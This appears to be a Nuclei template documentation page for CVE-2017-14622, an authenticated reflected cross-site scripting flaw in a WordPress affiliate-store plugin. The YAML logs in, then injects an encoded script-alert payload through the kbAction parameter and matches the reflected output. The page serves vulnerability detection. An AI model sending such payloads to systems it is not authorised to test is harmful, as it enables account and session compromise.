Skip to content
Nuclei Templates

WordPress 2kb Amazon Affiliates Store <2.1.1 - Cross-Site Scripting

ID: CVE-2017-14622

Severity: medium

Author: r3Y3r53

Tags: cve2017,cve,xss,wordpress,wp-plugin,wp,2kb-amazon-affiliates-store,authenticated,packetstorm,2kblater

Description

Section titled “Description”

WordPress 2kb Amazon Affiliates Store plugin before 2.1.1 contains multiple cross-site scripting vulnerabilities. The plugin allows an attacker to inject arbitrary web script or HTML via the (1) page parameter or (2) kbAction parameter in the kbAmz page to wp-admin/admin.php, thus making possible theft of cookie-based authentication credentials and launch of other attacks.

YAML Source

Section titled “YAML Source”
id: CVE-2017-14622


info:
  name: WordPress 2kb Amazon Affiliates Store <2.1.1 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    WordPress 2kb Amazon Affiliates Store plugin before 2.1.1 contains multiple cross-site scripting vulnerabilities. The plugin allows an attacker to inject arbitrary web script or HTML via the (1) page parameter or (2) kbAction parameter in the kbAmz page to wp-admin/admin.php, thus making possible theft of cookie-based authentication credentials and launch of other attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions.
  remediation: |
    Update the WordPress 2kb Amazon Affiliates Store plugin to version 2.1.1 or later to mitigate the vulnerability.
  reference:
    - https://packetstormsecurity.com/files/144261/WordPress-2kb-Amazon-Affiliates-Store-2.1.0-Cross-Site-Scripting.html
    - https://wordpress.org/plugins/2kb-amazon-affiliates-store/#developers
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14622
    - https://nvd.nist.gov/vuln/detail/CVE-2017-14622
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2017-14622
    cwe-id: CWE-79
    epss-score: 0.00135
    epss-percentile: 0.48695
    cpe: cpe:2.3:a:2kblater:2kb_amazon_affiliates_store:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: 2kblater
    product: 2kb_amazon_affiliates_store
    framework: wordpress
  tags: cve2017,cve,xss,wordpress,wp-plugin,wp,2kb-amazon-affiliates-store,authenticated,packetstorm,2kblater


http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin.php?page=kbAmz&kbAction=demo%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
        Host: {{Hostname}}


    redirects: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 500'
          - 'contains(content_type_2, "text/html")'
          - 'contains(body_2, "<script>alert(document.domain)</script>")'
          - 'contains(body_2, "2kb-amazon-affiliates-store")'
        condition: and
# digest: 490a0046304402206bbbd94cffba0983a5e0e035036e951526f43041fa0708bdad1c346b976f04c5022017377ef792ce0d0bc986c768ceff0c4a6df29f2d714adf10b89fa555bf1acba0:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2017/CVE-2017-14622.yaml"

View on Github